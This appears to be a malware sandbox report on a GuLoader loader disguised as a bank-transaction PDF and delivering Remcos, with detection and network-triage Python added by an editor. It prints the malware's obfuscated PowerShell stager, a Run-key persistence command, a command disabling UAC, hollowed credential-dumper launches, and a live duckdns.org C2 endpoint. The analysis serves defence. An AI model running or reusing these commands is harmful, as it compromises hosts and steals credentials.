Analysis Overview
SHA256
d7325eb4553b2c58a8580cb84af63cfe5cdf4ff23a3d4e09a963c656d5717d8c
Threat Level: Known bad
The file pko_trans_details_20240710_105339·pdf.exe was found to be: Known bad. The name uses a middle-dot character in place of the period of a fake ".pdf" extension; the real extension is .exe. The dropped artifacts below (C:\ProgramData\remcos\logs.dat, the powershell.exe images started with the NirSoft /stext switch, the duckdns.org C2 on port 3256) indicate that the GuLoader/CloudEyE stage ends in a Remcos payload.
Malicious Activity Summary
Guloader,Cloudeye
UAC bypass
NirSoft MailPassView
Nirsoft
NirSoft WebBrowserPassView
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Loads dropped DLL
Accesses Microsoft Outlook accounts
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Program crash
Enumerates physical storage devices
Unsigned PE
NSIS installer
Modifies registry key
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
MITRE ATT&CK (Enterprise Matrix V15)
Analysis: static1
Detonation Overview
Reported
2024-07-10 08:39
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-10 08:39
Reported
2024-07-10 08:42
Platform
win7-20240704-en
Max time kernel
14s
Max time network
19s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1144 wrote to memory of 760 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1144 wrote to memory of 760 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1144 wrote to memory of 760 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1144 wrote to memory of 760 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1144 wrote to memory of 760 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1144 wrote to memory of 760 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1144 wrote to memory of 760 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\BgImage.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\BgImage.dll,#1
Network
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-07-10 08:39
Reported
2024-07-10 08:42
Platform
win10v2004-20240709-en
Max time kernel
93s
Max time network
123s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4924 wrote to memory of 3416 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4924 wrote to memory of 3416 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4924 wrote to memory of 3416 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsDialogs.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\nsDialogs.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3416 -ip 3416
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 644
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-10 08:39
Reported
2024-07-10 08:42
Platform
win7-20240704-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Guloader,Cloudeye
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe | N/A |
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\Preeffort = "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\\Jeglasset\\').Communicatory;%Begittede% ($Assiduity)" | C:\Windows\SysWOW64\reg.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2284 set thread context of 1776 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2284 set thread context of 2336 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2284 set thread context of 2216 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Enumerates physical storage devices
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe
"C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -windowstyle hidden "$Forhrt=Get-Content 'C:\Users\Admin\AppData\Local\kilns\Unobtainably\Helicopter.San';$Forset=$Forhrt.SubString(45874,3);.$Forset($Forhrt)"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preeffort" /t REG_EXPAND_SZ /d "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\Jeglasset\').Communicatory;%Begittede% ($Assiduity)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preeffort" /t REG_EXPAND_SZ /d "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\Jeglasset\').Communicatory;%Begittede% ($Assiduity)"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\spihmgmddbbjigpockgw"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\djnamyferjtolmmslutqajl"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\fltsnrpyfrlbvbawufgrkogwrg"
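The process list above contains the whole chain in a handful of command lines. The NSIS dropper starts powershell.exe, which reads Helicopter.San, slices three characters out of it at offset 45874 and dot-invokes that slice with the file's own contents as the argument, so the verb that runs the payload never appears in the command line. cmd.exe and reg.exe then write a REG_EXPAND_SZ Run value whose command is the %Begittede% environment variable (resolved at logon, so the Run value alone does not name an executable) and set EnableLUA to 0 (effective after the next reboot). Finally three powershell.exe images are started with NirSoft's /stext switch, which PowerShell does not accept; together with the SetThreadContext entries above this shows the code running in those processes is not PowerShell. The following Python is an added detection example by the editor, not part of the sandbox report: it scans those command lines (copied here as constructed input) with four rules and pulls the file path and offset out of the stager so an analyst knows where to look in the dropped file. The three characters at that offset are not shown on the page and the script does not guess them.

```python
import re

# Command lines copied from the behavioral1 process list of this report
# (constructed input for the example; the rules below are the editor's).
SAMPLE_CMDLINES = [
    r'''"C:\Users\Admin\AppData\Local\Temp\pko_trans_details_20240710_105339·pdf.exe"''',
    r'''"powershell.exe" -windowstyle hidden "$Forhrt=Get-Content 'C:\Users\Admin\AppData\Local\kilns\Unobtainably\Helicopter.San';$Forset=$Forhrt.SubString(45874,3);.$Forset($Forhrt)"''',
    r'''"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preeffort" /t REG_EXPAND_SZ /d "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\Jeglasset\').Communicatory;%Begittede% ($Assiduity)"''',
    r'''REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Preeffort" /t REG_EXPAND_SZ /d "%Begittede% -windowstyle minimized $Assiduity=(Get-ItemProperty -Path 'HKCU:\Jeglasset\').Communicatory;%Begittede% ($Assiduity)"''',
    r'''/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f''',
    r'''C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f''',
    r'''C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\spihmgmddbbjigpockgw"''',
    r'''C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\djnamyferjtolmmslutqajl"''',
    r'''C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /stext "C:\Users\Admin\AppData\Local\Temp\fltsnrpyfrlbvbawufgrkogwrg"''',
]

RULES = {
    # GuLoader-style stager: read a dropped file, take a short slice out of it
    # and dot-invoke that slice with the file contents as the argument.
    "powershell_selfinvoking_stager": re.compile(
        r"Get-Content\s+'[^']+'.*\.SubString\(\d+,\s*\d+\).*;\.\$\w+\(", re.I),
    # Persistence: REG_EXPAND_SZ Run value whose command is an %ENVVAR%
    # rather than an executable path, resolved only at logon time.
    "run_key_envvar_launcher": re.compile(
        r'REG\s+ADD\s+HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\b'
        r'.*/t\s+REG_EXPAND_SZ\s+/d\s+"%\w+%', re.I),
    # UAC disabled machine-wide via EnableLUA=0.
    "uac_disable_enablelua": re.compile(
        r"Policies\\System\s+/v\s+EnableLUA\s+/t\s+REG_DWORD\s+/d\s+0\b", re.I),
    # powershell.exe image given NirSoft's /stext switch: the image name does
    # not match the code running inside it (hollowed host for a dumper).
    "hollowed_powershell_stext": re.compile(r'powershell\.exe\s+/stext\s+"', re.I),
}

# Captures the file the stager reads and the (offset, length) it slices out.
STAGER_RX = re.compile(
    r"Get-Content\s+'(?P<path>[^']+)'.*?\.SubString\((?P<off>\d+),\s*(?P<len>\d+)\)")


def scan(cmdlines):
    """Return {rule_name: [matching command lines]} for every rule that fired."""
    hits = {}
    for cmd in cmdlines:
        for name, rx in RULES.items():
            if rx.search(cmd):
                hits.setdefault(name, []).append(cmd)
    return hits


def extract_stager_offset(cmd):
    """Return (path, offset, length) for a self-invoking stager, else None.

    The analyst then reads `length` characters at `offset` in `path` to learn
    which verb the loader executes; the value itself is not inferred here.
    """
    m = STAGER_RX.search(cmd)
    if not m:
        return None
    return m.group("path"), int(m.group("off")), int(m.group("len"))


if __name__ == "__main__":
    for rule, cmds in scan(SAMPLE_CMDLINES).items():
        print(f"{rule}: {len(cmds)} hit(s)")
    print(extract_stager_offset(SAMPLE_CMDLINES[1]))
```

The rules key on shape rather than on the random identifier names (Forhrt, Begittede, Preeffort), which change per build; the slice length is left as `\d+` so a loader that extracts a longer token than three characters is still caught.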
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 216.58.201.99:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 216.58.201.99:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | a458386d9.duckdns.org | udp |
| DE | 217.76.50.73:3256 | a458386d9.duckdns.org | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| DE | 217.76.50.73:3256 | a458386d9.duckdns.org | tcp |
| DE | 217.76.50.73:3256 | a458386d9.duckdns.org | tcp |
| DE | 217.76.50.73:3256 | a458386d9.duckdns.org | tcp |
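Of the fifteen network rows above only a few are indicators. The following Python triage is an added example by the editor, not part of the sandbox report: it parses the rows (copied here as constructed input), discards resolver and PTR traffic and the fetches to pki.goog (assumed to be CRL/OCSP checks triggered by the HTTPS download), separates the file-sharing hosts the sandbox flagged as abused hosting from the rest, and treats a dynamic-DNS hostname contacted on a non-web port as the C2 candidate, counting repeat connections. geoplugin.net is reported as a check-in indicator rather than a block target because it is a public geolocation API; which categories to block is a local decision.

```python
from collections import Counter

# Rows copied from the behavioral1 Network table (constructed input).
NETWORK_ROWS = """\
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 172.217.16.238:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 216.58.201.99:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | o.pki.goog | udp |
| GB | 216.58.201.99:80 | o.pki.goog | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.201.97:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | a458386d9.duckdns.org | udp |
| DE | 217.76.50.73:3256 | a458386d9.duckdns.org | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| DE | 217.76.50.73:3256 | a458386d9.duckdns.org | tcp |
| DE | 217.76.50.73:3256 | a458386d9.duckdns.org | tcp |
| DE | 217.76.50.73:3256 | a458386d9.duckdns.org | tcp |
"""

SANDBOX_RESOLVER = "8.8.8.8:53"
# Assumption: these suffixes are certificate-validation plumbing, not C2.
CERT_INFRA = (".pki.goog",)
# Dynamic-DNS providers: a hostname here on a non-web port is a C2 candidate.
DYNDNS = (".duckdns.org",)
# Hosts the sandbox flagged under "Legitimate hosting services abused".
PAYLOAD_HOSTS = {"drive.google.com", "drive.usercontent.google.com"}
# Public geolocation API contacted once; kept as a check-in indicator.
GEO_APIS = {"geoplugin.net"}


def parse_rows(text):
    """Turn '| CC | ip:port | domain | proto |' lines into dicts."""
    rows = []
    for line in text.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 4:
            continue
        country, dest, domain, proto = cells
        ip, _, port = dest.rpartition(":")
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain, "proto": proto})
    return rows


def triage(rows):
    """Bucket each connection; C2 candidates are counted per endpoint."""
    result = {"c2": Counter(), "payload_hosting": set(), "geo_check": set(),
              "unclassified": set(), "noise": 0}
    for r in rows:
        d = r["domain"]
        if f'{r["ip"]}:{r["port"]}' == SANDBOX_RESOLVER or d.endswith(".in-addr.arpa"):
            result["noise"] += 1              # DNS queries and PTR lookups
        elif d.endswith(CERT_INFRA):
            result["noise"] += 1              # CRL/OCSP fetches
        elif d in PAYLOAD_HOSTS:
            result["payload_hosting"].add(d)  # second stage pulled from here
        elif d in GEO_APIS:
            result["geo_check"].add(d)
        elif d.endswith(DYNDNS) and r["port"] not in (80, 443):
            result["c2"][(d, r["ip"], r["port"])] += 1
        else:
            result["unclassified"].add((d, r["ip"], r["port"]))
    return result


def blocklist(result):
    """Indicators safe to block outright: the C2 hostnames and ip:port pairs."""
    out = set()
    for domain, ip, port in result["c2"]:
        out.add(domain)
        out.add(f"{ip}:{port}")
    return sorted(out)


if __name__ == "__main__":
    summary = triage(parse_rows(NETWORK_ROWS))
    for (domain, ip, port), n in summary["c2"].items():
        print(f"C2 {domain} -> {ip}:{port} ({n} connections)")
    print("payload hosting:", sorted(summary["payload_hosting"]))
    print("check-in:", sorted(summary["geo_check"]))
    print("block:", blocklist(summary))
```

Anything that lands in `unclassified` is the row an analyst should look at by hand; on this report that set is empty, and the four connections to the same duckdns.org endpoint on port 3256 within the 150-second run are the beaconing pattern to alert on.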
Files
\Users\Admin\AppData\Local\Temp\nso47AB.tmp\nsDialogs.dll
| MD5 | 1c8b2b40c642e8b5a5b3ff102796fb37 |
| SHA1 | 3245f55afac50f775eb53fd6d14abb7fe523393d |
| SHA256 | 8780095aa2f49725388cddf00d79a74e85c9c4863b366f55c39c606a5fb8440c |
| SHA512 | 4ff2dc83f640933162ec8818bb1bf3b3be1183264750946a3d949d2e7068ee606277b6c840193ef2b4663952387f07f6ab12c84c4a11cae9a8de7bd4e7971c57 |
\Users\Admin\AppData\Local\Temp\nso47AB.tmp\BgImage.dll
| MD5 | 521df745a41f0b8164ffd01717cacbba |
| SHA1 | dc7a9eacfbeb1fae52091da5e80db6cb1b6bce74 |
| SHA256 | dbf91707fa157603bea025a6411cdcb497ab11262c9c18b14dc431a45aa17c0b |
| SHA512 | c5b1ba062872a8f534e2f0eac57fc3c0d8be9cda79605d86566d67260ba5477444a0ddfed1838b4fb14c677e5342c8419a88fcd38147dbaa36ac1f9e00c52bbe |
\Users\Admin\AppData\Local\Temp\nso47AB.tmp\UserInfo.dll
| MD5 | acbda33dd5700c122e2fe48e3d4351fd |
| SHA1 | 2c154baf7c64052ee712b7cdf9c36b7697dd3fc8 |
| SHA256 | 943b33829f9013e4d361482a5c8981ba20a7155c78691dbe02a8f8cd2a02efa0 |
| SHA512 | d090adf65a74ac5b910b18bb67e989714335e7b4778cd771cff154d7186351a1bebbc7103cca849bdfa2709c991947ffff6c1d8fdf16a74f4dfb614bce3ff6fd |
memory/2284-30-0x00000000737B1000-0x00000000737B2000-memory.dmp
memory/2284-32-0x00000000737B0000-0x0000000073D5B000-memory.dmp
memory/2284-33-0x00000000737B0000-0x0000000073D5B000-memory.dmp
memory/2284-31-0x00000000737B0000-0x0000000073D5B000-memory.dmp
memory/2284-34-0x00000000737B0000-0x0000000073D5B000-memory.dmp
C:\Users\Admin\AppData\Local\kilns\Unobtainably\Helicopter.San
| MD5 | bf1ebfd1285dd7ef43a587e9f51a8e33 |
| SHA1 | 1dede4026611e9f40c91d9bbe406a06b2fd8bfa4 |
| SHA256 | de1db1c0a065f580b4fe878c5b363933e45ec7f0c06118d29b6d167af24189ff |
| SHA512 | 3b7b11a8989a0b46e4091c8e4c81e71a2454fc9fba77618d844653d548ecd59a2c8b8fce3338fa499ca84da8664f7e34f355ab8b18e3507598f5f63dd3a80389 |
memory/2284-37-0x00000000737B0000-0x0000000073D5B000-memory.dmp
memory/2284-38-0x00000000737B0000-0x0000000073D5B000-memory.dmp
C:\Users\Admin\AppData\Local\kilns\Unobtainably\Polemoniaceae11.Non
| MD5 | afc1982fff88592a55312010cfc773c6 |
| SHA1 | c57e918c5149ca9c2a331a78ecef84ffc667feb7 |
| SHA256 | 02a71af4b95cf275ba0430022e9c2665bd1e4ddb3177202c1c3059901eefd4f0 |
| SHA512 | f4acf46244cb0115e0666a631af6dd2e7400478103cd9c152e48307a2239108e7e6bf3b39467747b3efa8b0fbdc59216ad6a26ec5587c19bb56fb4512233117e |
memory/2284-40-0x00000000737B0000-0x0000000073D5B000-memory.dmp
memory/2284-41-0x00000000737B0000-0x0000000073D5B000-memory.dmp
memory/2284-43-0x00000000062B0000-0x000000000AE6C000-memory.dmp
memory/2284-65-0x00000000062B0000-0x000000000AE6C000-memory.dmp
memory/1776-73-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2336-75-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2336-76-0x0000000000400000-0x0000000000462000-memory.dmp
memory/2216-80-0x0000000000400000-0x0000000000424000-memory.dmp
memory/2216-83-0x0000000000400000-0x0000000000424000-memory.dmp
memory/1776-82-0x0000000000400000-0x0000000000478000-memory.dmp
memory/2336-81-0x0000000000400000-0x0000000000462000-memory.dmp
memory/1776-78-0x0000000000400000-0x0000000000478000-memory.dmp
memory/2336-77-0x0000000000400000-0x0000000000462000-memory.dmp
memory/1776-74-0x0000000000400000-0x0000000000478000-memory.dmp
memory/2216-84-0x0000000000400000-0x0000000000424000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\spihmgmddbbjigpockgw
| MD5 | f3b25701fe362ec84616a93a45ce9998 |
| SHA1 | d62636d8caec13f04e28442a0a6fa1afeb024bbb |
| SHA256 | b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 |
| SHA512 | 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84 |
C:\ProgramData\remcos\logs.dat
| MD5 | e607cf77e798eb275450c3cda5efeb1c |
| SHA1 | 0b3602942f3d9ad7e1f1ef979ebe589dbc8a8862 |
| SHA256 | 9751f67592c212d9ec4b500087a13140f1feb12af149c0ccbbed240328d71011 |
| SHA512 | 59e4cb59341bca7c436eac0e6e471e52dea263d829fc9c498cd9eabdc6808b6f15931b8a6068e32cfc170ea39ddf4f3bdb300ef937f5aedbb419ea5ee77dd411 |
memory/2284-91-0x0000000010000000-0x0000000010019000-memory.dmp
memory/2284-95-0x0000000010000000-0x0000000010019000-memory.dmp
memory/2284-94-0x0000000010000000-0x0000000010019000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-10 08:39
Reported
2024-07-10 08:42
Platform
win10v2004-20240709-en
Max time kernel
149s
Max time network
153s
Command Line
Signatures
Guloader,Cloudeye
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
